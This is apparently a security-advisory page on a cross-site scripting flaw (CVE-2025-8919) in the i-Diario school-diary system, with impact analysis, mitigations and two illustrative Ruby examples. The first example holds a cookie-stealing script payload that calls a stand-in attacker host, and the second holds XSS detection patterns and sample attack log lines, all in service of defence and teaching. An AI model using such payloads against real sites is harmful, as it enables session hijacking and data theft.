CVE-2025-8919: Cross Site Scripting in Portabilis i-Diario
A vulnerability was determined in Portabilis i-Diario up to 1.6. Affected is an unknown function of the file /objetivos-de-aprendizagem-e-habilidades of the component History Page. The manipulation of the argument código/objetivo habilidade leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
AI Analysis
Technical Summary
CVE-2025-8919 is a cross-site scripting (XSS) vulnerability in Portabilis i-Diario, affecting versions up to and including 1.6 (listed as 1.0 through 1.6). The flaw lies in an unspecified function behind the /objetivos-de-aprendizagem-e-habilidades route, which belongs to the History Page component. The 'código/objetivo habilidade' (learning-objective/skill code) argument is written into the page without adequate validation or output encoding, so whoever controls that value can have script execute in the browser of any user who views the page.

The CVSS 4.0 vector published with the advisory is AV:N/AC:L/PR:H/UI:P with VI:L and no confidentiality or availability impact, and it should be read as stated: the attack is network-reachable (AV:N) and simple (AC:L), but the attacker needs high privileges in the application (PR:H) and a victim must passively interact with the injected content (UI:P), for example by opening the History Page. The word "remotely" in the original description refers to the network attack vector, not to unauthenticated access. The PR:H/UI:P combination is consistent with a payload that a privileged user saves through the objective/skill field and that later fires for other users, although the advisory does not state the injection point more precisely.

Portabilis was contacted before publication and did not respond; no fixed version or vendor mitigation has been published. An exploit has been disclosed publicly, and although there are no reports of exploitation in the wild, public availability lowers the bar for attempts. XSS in this context can be used to steal session cookies that are not marked HttpOnly, perform actions with the victim's privileges, or redirect users to phishing or malware pages. i-Diario is a digital class-diary and school management system used mainly in Brazil and potentially in other Portuguese-speaking countries, so the users at risk are typically teachers, school administrators and students.
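The pattern behind this class of bug, and the output-encoding and input-validation controls that address it, as an added example in Ruby (i-Diario is a Ruby on Rails application). This is illustrative code written for this page, not i-Diario's own; the parameter name "codigo", the table markup and the code format are assumptions.

```ruby
# Added example (not i-Diario code): how an HTML-body XSS arises from
# unescaped template output, and the two controls that address it.
# The parameter name "codigo", the <td> markup and the code format are
# assumptions for illustration.
require "erb"

# Constructed attacker-controlled value standing in for the
# "código/objetivo habilidade" argument. Leaks document.cookie if executed.
PAYLOAD = %q{<script>new Image().src="https://evil.example/c?"+document.cookie</script>}

# Vulnerable rendering: the value is interpolated into the HTML as-is.
# Plain ERB's <%= %> does not escape; in Rails the equivalent mistake is
# calling raw/html_safe on user data or using <%== %>.
VULNERABLE_TEMPLATE = ERB.new(<<~HTML)
  <tr><td class="codigo"><%= codigo %></td></tr>
HTML

def render_vulnerable(codigo)
  VULNERABLE_TEMPLATE.result_with_hash(codigo: codigo)
end

# Hardened rendering: the value is HTML-entity encoded for the body context,
# so < > & " ' cannot close the text node or open a tag.
SAFE_TEMPLATE = ERB.new(<<~HTML)
  <tr><td class="codigo"><%= ERB::Util.html_escape(codigo) %></td></tr>
HTML

def render_safe(codigo)
  SAFE_TEMPLATE.result_with_hash(codigo: codigo)
end

# Input validation as defence in depth: learning-objective codes are short
# alphanumeric identifiers (assumed format, e.g. "EF01LP01"). Reject anything
# else before it is stored. This narrows the field but does not replace
# output encoding, because other fields may still reach a template unescaped.
CODIGO_FORMAT = /\A[A-Z0-9]{2,20}\z/

def valid_codigo?(codigo)
  CODIGO_FORMAT.match?(codigo.to_s)
end

# True if the rendered HTML still contains a live script tag.
def live_script?(html)
  html.match?(/<script/i)
end

if __FILE__ == $PROGRAM_NAME
  puts "vulnerable: #{render_vulnerable(PAYLOAD)}"
  puts "hardened:   #{render_safe(PAYLOAD)}"
  puts "valid? EF01LP01 -> #{valid_codigo?('EF01LP01')}, payload -> #{valid_codigo?(PAYLOAD)}"
end
```

The escaping shown is correct only for the HTML body context; a value placed inside an attribute, a script block or a URL needs the encoder for that context, which is why the fix belongs at the output site rather than in a single input filter.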
Potential Impact
For European organizations the exposure depends on whether Portabilis i-Diario is deployed at all; it is primarily a Brazilian product, so European use is most likely in institutions serving Portuguese-speaking communities. Where it is deployed, an attacker who already holds a privileged account, or who has compromised one, can inject script that runs in the browsers of other users of the History Page, leading to session hijacking, actions performed with the victim's privileges, or phishing of educators, students and administrators. The CVSS 4.0 scoring records no confidentiality impact, but that describes the scored vulnerability alone, not what a follow-on attack with a hijacked session could reach: educational records and the personal data of minors are exactly what i-Diario manages, so both privacy and the integrity of records are at stake. The medium severity is offset by the lack of vendor response and of a patch, and the flaw could serve as a foothold when combined with other weaknesses or social engineering. The privilege requirement limits the pool of attackers to insiders and account-takeover scenarios, and the user-interaction requirement rules out fully automated exploitation, but neither eliminates the risk, particularly in environments where users are less security-aware.
Mitigation Recommendations
No vendor fix is available, so operators have to act themselves. i-Diario is open source and typically self-hosted, which makes the following practical:
- Patch the rendering of the 'código/objetivo habilidade' value on the History Page so that it is HTML-entity encoded at output, and validate the code on input against the format the field actually needs (short alphanumeric identifiers). Output encoding is the control that removes the bug; validation is defence in depth.
- Because the vector requires high privileges, review which accounts can create or edit learning objectives and skills, and search the stored objective/skill records for existing script tags or event handlers: a stored payload keeps firing until the record is cleaned, whatever is done at the edge.
- Deploy a web application firewall rule that inspects parameters on requests to /objetivos-de-aprendizagem-e-habilidades for XSS indicators as interim protection, with the understanding that WAF rules can be bypassed and do nothing about payloads already stored.
- Monitor access and application logs for requests to that path carrying encoded or double-encoded angle brackets, script tags or event handlers. A payload submitted in a POST body is not visible in a standard access log, so log the relevant parameter at the application layer as well.
- Set a Content-Security-Policy that disallows inline script, and mark the session cookie HttpOnly and SameSite, to reduce what a successful injection can do.
- Restrict the affected component to trusted users, or the whole application to the institution's network or VPN, until a fix is in place.
- Educate users about unexpected links and content, and include XSS and input-validation checks in regular security assessments and penetration tests.
If the vendor remains unresponsive, consider migrating to a platform with active security support.
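A minimal access-log triage for the monitoring recommendation, as an added Ruby example (not i-Diario code and not part of the advisory). The log lines are constructed for the example, the parameter name "codigo" is an assumption, and the script deliberately shows the limit of this approach: a payload carried in a POST body never appears in a combined-format access log.

```ruby
# Added example (not i-Diario code): triage of web-server access logs for
# injection attempts against the affected route. Log lines are constructed,
# and the parameter name "codigo" is an assumption.
require "uri"

AFFECTED_PATH = "/objetivos-de-aprendizagem-e-habilidades"

# Indicators of attempted script injection, evaluated after URL decoding.
XSS_PATTERNS = [
  /<\s*script/i,                          # <script ...>
  /<\s*(img|svg|iframe|body|details)\b/i, # tags commonly used as event-handler carriers
  /\bon[a-z]+\s*=/i,                      # onerror=, onload=, ...
  /javascript\s*:/i,                      # javascript: URLs
].freeze

# Combined log format: ip ident user [time] "METHOD target HTTP/x" status bytes
LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<target>\S+) [^"]*" (?<status>\d{3})/

# Decode up to `rounds` times so that double-encoded payloads
# (%253C -> %3C -> <) are seen in their final form.
def decode_fully(value, rounds = 2)
  rounds.times do
    decoded = URI.decode_www_form_component(value)
    break if decoded == value
    value = decoded
  end
  value
end

# Returns one hash per suspicious parameter on requests to the affected
# path: { ip:, time:, method:, param:, value: } with the decoded payload.
def find_xss_attempts(log_text)
  hits = []
  log_text.each_line do |line|
    m = LOG_LINE.match(line) or next
    path, query = m[:target].split("?", 2)
    next unless path.start_with?(AFFECTED_PATH) && query
    params = begin
      URI.decode_www_form(query)
    rescue ArgumentError
      next # malformed %-encoding: skip here (or alert on it separately)
    end
    params.each do |name, value|
      decoded = decode_fully(value)
      next unless XSS_PATTERNS.any? { |re| re.match?(decoded) }
      hits << { ip: m[:ip], time: m[:time], method: m[:method], param: name, value: decoded }
    end
  end
  hits
end

# Constructed sample: a benign lookup, a plain and a double-encoded payload
# against the affected route, an unrelated route, and a POST whose body
# (where a stored payload would travel) is not visible in the access log.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [21/Aug/2025:10:15:01 +0000] "GET /objetivos-de-aprendizagem-e-habilidades?codigo=EF01LP01 HTTP/1.1" 200 5123
  203.0.113.7 - - [21/Aug/2025:10:16:42 +0000] "GET /objetivos-de-aprendizagem-e-habilidades?codigo=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 5210
  203.0.113.7 - - [21/Aug/2025:10:17:03 +0000] "GET /objetivos-de-aprendizagem-e-habilidades?codigo=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 5198
  10.0.0.9 - - [21/Aug/2025:10:18:30 +0000] "GET /alunos?nome=%3Cscript%3E HTTP/1.1" 200 900
  203.0.113.7 - admin [21/Aug/2025:10:19:11 +0000] "POST /objetivos-de-aprendizagem-e-habilidades HTTP/1.1" 302 0
LOG

if __FILE__ == $PROGRAM_NAME
  find_xss_attempts(SAMPLE_LOG).each do |h|
    puts "#{h[:time]} #{h[:ip]} #{h[:method]} #{h[:param]}=#{h[:value]}"
  end
end
```

Only the two GET requests are flagged; the POST from the same client is exactly the request this detection cannot see into, which is why the recommendation pairs access-log monitoring with application-level logging of the stored field.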
Affected Countries
Portugal, Spain, France, Germany, Italy
Technical Details
- Data Version: 5.1
- Assigner Short Name: VulDB
- Date Reserved: 2025-08-13T10:53:00.673Z
- CVSS Version: 4.0
- State: PUBLISHED
Threat ID: 689ccfdaad5a09ad004fb50b
Added to database: 8/13/2025, 5:48:10 PM
Last enriched: 8/21/2025, 1:00:08 AM
Last updated: 9/26/2025, 5:56:51 AM
Related Threats
CVE-2025-9816: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in veronalabs WP Statistics – Simple, privacy-friendly Google Analytics alternative (High)
CVE-2025-11050: Improper Authorization in Portabilis i-Educar (Medium)
CVE-2025-10499: CWE-352 Cross-Site Request Forgery (CSRF) in kstover Ninja Forms – The Contact Form Builder That Grows With You (Medium)
CVE-2025-10498: CWE-352 Cross-Site Request Forgery (CSRF) in kstover Ninja Forms – The Contact Form Builder That Grows With You (Medium)
CVE-2025-8440: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in spwebguy Team Members (Medium)